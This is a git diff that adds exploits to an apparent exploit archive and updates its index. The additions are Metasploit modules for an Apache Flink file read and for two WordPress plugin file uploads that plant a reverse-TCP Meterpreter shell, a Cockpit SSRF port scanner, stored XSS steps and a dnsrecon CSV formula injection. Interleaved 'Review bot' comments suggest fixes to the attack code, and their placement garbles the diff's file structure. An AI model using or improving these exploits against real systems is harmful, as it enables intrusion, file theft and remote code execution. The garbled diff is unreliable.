diff --git a/exploits/java/webapps/49398.rb b/exploits/java/webapps/49398.rb
new file mode 100755
index 000000000..33c1cb1db
--- /dev/null
+++ b/exploits/java/webapps/49398.rb
@@ -0,0 +1,72 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Apache Flink File Read Vulnerability', + 'Description' => %q{ + This module exploits an unauthenticated directory traversal vulnerability + in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well), + allowing arbitrary file read with the web server privileges + }, + 'Author' => + [ + '0rich1 - Ant Security FG Lab', # Vulnerability discovery + 'Hoa Nguyen - Suncsr Team', # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-17519'], + ['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'], + ['URL', 'https://www.tenable.com/cve/CVE-2020-17519'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [['', {}]], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 05 2021' + + )) + + register_options([ + OptInt.new('DEPTH',[true,'Traversal Depth',12]), + OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd']) + ]) + end + + def run_host(ip) + traversal = '..%252f' * datastore['DEPTH'] + filename = datastore['FILEPATH'].gsub("/","%252f") + filename = filename[1, filename.length] if filename =~ /^\// + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#(unknown)"), + }) + + fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 + fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? 
+ + print_status('Downloading file...') + print_line("\n#{res.body}\n") + fname = datastore['FILEPATH'] + path = store_loot( + 'apache.traversal', + 'text/plain', + ip, + res.body, + fname + ) + print_good("File saved in: #{path}") + end + end \ No newline at end of file diff --git a/exploits/multiple/webapps/49397.txt b/exploits/multiple/webapps/49397.txt new file mode 100644 index 000000000..85aafcb18 --- /dev/null +++ b/exploits/multiple/webapps/49397.txt 
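Review bot: The metadata in `initialize` describes an exploit module rather than this auxiliary scanner: `'Platform' => ['php']` and `'Arch' => ARCH_PHP` do not fit an Apache Flink (Java) target, and `'Targets'`/`'DefaultTarget'` carry no meaning for `Msf::Auxiliary`, so anyone filtering modules by platform or arch will be misled. Dropping the `'Arch'`, `'Targets'` and `'DefaultTarget'` keys and either omitting `'Platform'` or setting it to the platform the Flink service runs on would make the metadata honest. In `run_host`, the `res.code != 200` branch reports `'Connection failed. Nothingn was downloaded'` although the request did complete; a status-specific message such as `"Unexpected HTTP status #{res.code}; target is probably not vulnerable"` fixes both the wording and the typo. The `filename =~ /^\//` test anchors with `^`, which matches at any line start; `filename = filename[1..] if filename.start_with?('/')` states the intent without a regex.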
@@ -0,0 +1,88 @@ +# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated) +# Date: 08.01.2021 +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://cockpit-project.org/ +# Version: v234 +# Tested on: Ubuntu 18.04 + +#!/usr/bin/python3 +import argparse +import requests +import sys +import urllib3 +import time +from colorama import Fore, Style +from argparse import ArgumentParser, Namespace +from bs4 import BeautifulSoup + +""" +Example scanning for internal server: +python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23 +Example scanning for loopback interface of server: +python3 PoC.py --target 192.168.1.33:9090 +Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md +""" + +def main(): + dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)" + parser: ArgumentParser = argparse.ArgumentParser(description=dsc) + parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True) + parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False) + parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False) + args: Namespace = parser.parse_args() + + if args.target: + target = args.target + if args.scan: + scan = args.scan + if args.ports: + ports = args.ports + else: + ports = "22" + else: + scan = "127.0.0.1" + if args.ports: + ports = args.ports + else: + ports = "22" + cockpitReq(target, scan, ports) + +def cockpitReq(target, scan, ports): + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + portRange = ports.split(",") + for unsafe in portRange: + headers = { + "Host": str(target), + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", + "Accept": "*/*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Authorization": "Basic 
dW5zYWZlOmlubGluZQ==", + "X-Authorize": "", + "Connection": "close", + "Cookie": "cockpit=deleted", + } + req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False) + time.sleep(2) + soup = BeautifulSoup(req.text, 'html.parser') + responseCode = req.status_code + responseTime = str(req.elapsed) + + if responseCode == 404: + print("Cockpit server was not found!") + elif responseCode == 401: + if soup.title.string == "Authentication failed": + print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!") + elif soup.title.string == "Authentication failed: no-host": + if responseTime > "0:00:10.000000": + print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!") + else: + print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!") + else: + print(Fore.RED + Style.BRIGHT +"[-] Error is occured!") + print("[-] One bad day!") + sys.exit(1) + else: + print("Something went wrong!") + +main() \ No newline at end of file diff --git a/exploits/php/webapps/49395.txt b/exploits/php/webapps/49395.txt new file mode 100644 index 000000000..19936b580 --- /dev/null +++ b/exploits/php/webapps/49395.txt @@ -0,0 +1,9 @@ +# Exploit Title: Life Insurance Management System 1.0 - Multiple Stored XSS +# Date: 4/1/2021 +# Exploit Author: Arnav Tripathy +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html +# Version: 1.0 +# Tested on: linux / Lamp + +Click on add payment once logged in. Put and so on in all parameters. You will notice popup once you navigate to payments. \ No newline at end of file diff --git a/exploits/php/webapps/49396.txt b/exploits/php/webapps/49396.txt new file mode 100644 index 000000000..d54e9824a --- /dev/null +++ b/exploits/php/webapps/49396.txt 
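Review bot: The `#!/usr/bin/python3` shebang on the new side sits after the `# Exploit Title` header block, so it is an ordinary comment and does not make the file directly executable; it has to be the first line of the file, with the header below it. The usage text in the triple-quoted string is placed after the imports, and a string is only treated as the module docstring when it is the first statement, so it should move ahead of `import argparse` or become a comment block. `main()` and `cockpitReq` carry no docstrings; a one-line description of what `target`, `scan` and `ports` mean on `cockpitReq` would spare readers reconstructing that from the argparse help strings.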
@@ -0,0 +1,13 @@ +# Exploit Title: Online Doctor Appointment System 1.0 - Multiple Stored XSS +# Tested on: Windows 10 +# Exploit Author: Mohamed habib Smidi (Craniums) +# Date: 2021-01-08 +# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code +# Affected Version: Version 1 + +Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php +Step 2: then Click on the username and go to profile +Step 3: Click on Update profile. +Step 4: Input "" in the field First Name,Last Name and Address. +Step 5: This Will trigger the payload each time you update or visit a new page. \ No newline at end of file diff --git a/exploits/php/webapps/49399.rb b/exploits/php/webapps/49399.rb new file mode 100755 index 000000000..e7433467c --- /dev/null +++ b/exploits/php/webapps/49399.rb 
@@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Wordpress Autoptimize Authenticated File Upload', + 'Description' => %q{ + The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, + allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. + }, + 'Author' => + [ + 'Khanh Nguyen - Suncsr Team', # Vulnerability discovery + 'Hoa Nguyen - Suncsr Team', # Metasploit module + 'Thien Ngo - Suncsr Team' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2020-24948'], + ['EDB', '48770'], + ['WPVDB', '10372'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'DefaultOptions' => { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + }, + 'Targets' => [['WP Autoptimize 2.7.6', {}]], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2020-08-24')) + + register_options( + [ + OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]), + OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil]) + ]) + end + + def check + check_plugin_version_from_readme('autoptimize','2.7.7') + end + + def ao_ccss_import_nonce(cookie) + res = send_request_cgi({ + 'uri' => normalize_uri(wordpress_url_backend,'options-general.php'), + 'cookie' => cookie, + 'vars_get' => { + 'page' => 'ao_critcss' + } + },5) + + if res.code == 200 + print_good("Found ao_ccss_import_nonce_code Value!") + else + fail_with(Failure::Unknown,'Server did not response in an expected way') + end + + ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0] + return 
ao_ccss_import_nonce_code + end + + def exploit + username = datastore['USERNAME'] + password = datastore['PASSWORD'] + print_status("Trying to login as #{username}") + cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD']) + if cookie.nil? + print_error("Unable to login as #{username}") + end + + vars = ao_ccss_import_nonce(cookie) + print_status("Trying to upload payload") + filename = "#{rand_text_alpha_lower(8)}.php" + + data = Rex::MIME::Message.new + data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"') + data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"') + data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#(unknown)\"") + post_data = data.to_s + print_status("Uploading payload") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data, + 'cookie' => cookie + }) + + if res.code == 200 + register_files_for_cleanup(filename) + else + fail_with(Failure::Unknown,'Server did not response in an expected way') + end + + print_status("Calling uploaded file #(unknown)") + send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/49401.rb b/exploits/php/webapps/49401.rb new file mode 100755 index 000000000..220607995 --- /dev/null +++ b/exploits/php/webapps/49401.rb 
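Review bot: The two `register_options` descriptions are swapped: `USERNAME` is described as `'The WordPress password to authenticate with'` and `PASSWORD` as `'The WordPress username to authenticate with'`, which is exactly the text `show options` presents to the operator; exchange the two strings. `check` compares the readme version against `'2.7.7'` while `'Targets'` names `2.7.6`, and nothing explains the relation; a comment such as `# 2.7.7 is the first fixed release, so anything below it is flagged` would document the intent, assuming that is indeed the fix version (not verifiable from the hunk). In `exploit`, a failed `wordpress_login` only prints an error and execution continues into `ao_ccss_import_nonce(cookie)` with a nil cookie; `fail_with(Failure::NoAccess, "Unable to login as #{username}")` in place of `print_error` stops the module where the failure is already known.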
@@ -0,0 +1,106 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HTTP::Wordpress + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability', + 'Description' => %q{ + This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin + version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, + including PHP files, and achieve remote code execution on a vulnerable site’s server. + }, + 'Author' => + [ + 'Chloe Chamberland', # Vulnerability Discovery, initial msf module + 'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['WPVDB', '10333'], + ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'], + ['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'], + ['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz'] + ], + 'Privileged' => false, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['wpDiscuz < 7.0.5', {}]], + 'DisclosureDate' => 'Feb 21 2020', + 'DefaultOptions' => + { + 'PAYLOAD' => 'php/meterpreter/reverse_tcp' + }, + 'DefaultTarget' => 0)) + + register_options [ + OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]), + ] + end + + def check + check_plugin_version_from_readme('wpdiscuz','7.0.5') + end + + def blogpath + datastore['BLOGPATH'] + end + + def find_wmusecurity_id + res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5) + wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures + return wmusecurity_id + end + + def exploit + 
wmusecurity_id = find_wmusecurity_id[0] + php_page_name = rand_text_alpha(5 + rand(5)) + '.php' + data = Rex::MIME::Message.new + data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"') + data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"') + data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"') + data.add_part('1', nil, nil, 'form-data; name="postId"') + data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"") + post_data = data.to_s + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'), + 'method' => 'POST', + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + ) + + time = Time.new + year = time.year.to_s + month = "%02d" % time.month + + regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/) + wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"") + + if res + if res.code == 200 && res.body =~ /#{php_page_name}/ + print_good("Payload uploaded as #{php_page_name}") + register_files_for_cleanup(php_page_name) + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") + end + else + fail_with(Failure::Unknown, "#{peer} - Server did not answer") + end + + print_status("Calling payload...") + send_request_cgi( + { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)}, + 5 + ) + + end +end \ No newline at end of file diff --git a/exploits/python/local/49394.txt b/exploits/python/local/49394.txt new file mode 100644 index 000000000..668c5999c --- /dev/null +++ b/exploits/python/local/49394.txt 
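Review bot: The metadata is internally inconsistent: `'Name'` abbreviates to `'Unauthen'`, the description names `version 7.0.4` while `'Targets'` says `'wpDiscuz < 7.0.5'`, and `'Platform' => 'php'` is a bare string where the other modules in this commit use an array; `'Name' => 'WordPress wpDiscuz Unauthenticated File Upload'` and `'Platform' => ['php']` would align it. The upload path is reconstructed in `exploit` from `Time.new` on the local host (`year`/`month`), which silently assumes the target keeps the default date-organised uploads layout and that both clocks agree on the month; that deserves a comment next to `time = Time.new`, e.g. `# assumes default year/month upload layout and matching clocks on both ends`. The `res.body.match(...)` call and the `wp_shell_upload` derivation run before the `if res` guard, so a nil `res` raises `NoMethodError` and never reaches `fail_with(Failure::Unknown, ...)`; moving those two lines below the guard keeps the error reporting meaningful.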
@@ -0,0 +1,37 @@ +# Exploit Title: dnsrecon 0.10.0 - CSV Injection +# Author: Dolev Farhi +# Date: 2021-01-07 +# Vendor Homepage: https://github.com/darkoperator/dnsrecon/ +# Version : 0.10.0 +# Tested on: ParrotOS 4.10 + +dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String. +A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way: + +_spf.example.com "test',=1+1337,'z" + + +user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8 +[*] Performing General Enumeration of Domain: _spf.example.com +[-] DNSSEC is not configured for _spf.example.com +[*] SOA ns-59.awsdns-07.com 205.1.1.1 +[-] Could not Resolve NS Records for _spf.example.com +[-] Could not Resolve MX Records for _spf.example.com +[*] TXT _spf.example.com test',=1+1337,'z +[*] Enumerating SRV Records +[+] 0 Records Found +[*] Saving records to CSV file: ./file.csv +{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'} +{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"} + + +This output will then be rewritten into a CSV with this structure: + +Type,Name,Address,Target,Port,String +SOA,ns-59.awsdns-07.com,205.1.1.1 +TXT,_spf.example.com,,,,'test',=1+1337,'z' + +The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464: + +Attribute Values + All printable ASCII characters are permitted in the attribute value. \ No newline at end of file diff --git a/exploits/windows/remote/46697.py b/exploits/windows/remote/46697.py index 3b65609ac..0c3040b61 100755 --- a/exploits/windows/remote/46697.py +++ b/exploits/windows/remote/46697.py 
@@ -5,9 +5,9 @@ # Version: 3.008 # Tested on: Windows 10 -Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it -This script pops calc as proof of concept (albeit a bit slowly) -It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself +#Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it +#This script pops calc as proof of concept (albeit a bit slowly) +#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself #!/usr/bin/python2 diff --git a/exploits/windows/remote/643.c b/exploits/windows/remote/643.c index 670dd0d2f..245665a18 100644 --- a/exploits/windows/remote/643.c +++ b/exploits/windows/remote/643.c @@ -9,7 +9,7 @@ #include #include -define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ +#define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/ #define port 110 /* revshell العراق القراصنة المجموعة*/ diff --git a/files_exploits.csv b/files_exploits.csv index 7fe8e8e3e..2063543ff 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -11243,6 +11243,7 @@ id,file,description,date,author,type,platform,port
 49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
+49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -30834,7 +30835,7 @@ id,file,description,date,author,type,platform,port
 26463,exploits/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities",2005-11-02,enji@infosys.tuwien.ac.at,webapps,cgi,
 26465,exploits/php/webapps/26465.txt,"CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php,
 26466,exploits/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,webapps,php,
-26467,exploits/php/webapps/26467.txt,"PHP Handicapper - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php,
+26467,exploits/php/webapps/26467.txt,"PHP Handicapper (2005) - 'Process_signup.php' HTTP Response Splitting",2005-11-03,BiPi_HaCk,webapps,php,
 26468,exploits/php/webapps/26468.pl,"Galerie 2.4 - 'showgallery.php' SQL Injection",2005-11-03,abducter_minds@yahoo.com,webapps,php,
 26469,exploits/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,webapps,php,
 26470,exploits/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,webapps,php,
@@ -43601,3 +43602,9 @@ id,file,description,date,author,type,platform,port
 49391,exploits/php/webapps/49391.txt,"Curfew e-Pass Management System 1.0 - Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
 49392,exploits/php/webapps/49392.txt,"ECSIMAGING PACS 6.21.5 - SQL injection",2021-01-07,shoxxdj,webapps,php,
 49393,exploits/php/webapps/49393.txt,"CRUD Operation 1.0 - Multiple Stored XSS",2021-01-07,"Arnav Tripathy",webapps,php,
+49395,exploits/php/webapps/49395.txt,"Life Insurance Management System 1.0 - Multiple Stored XSS",2021-01-08,"Arnav Tripathy",webapps,php,
+49396,exploits/php/webapps/49396.txt,"Online Doctor Appointment System 1.0 - Multiple Stored XSS",2021-01-08,"Mohamed habib Smidi",webapps,php,
+49397,exploits/multiple/webapps/49397.txt,"Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)",2021-01-08,"Metin Yunus Kandemir",webapps,multiple,
+49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,
+49399,exploits/php/webapps/49399.rb,"WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,
+49401,exploits/php/webapps/49401.rb,"Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit)",2021-01-08,"SunCSR Team",webapps,php,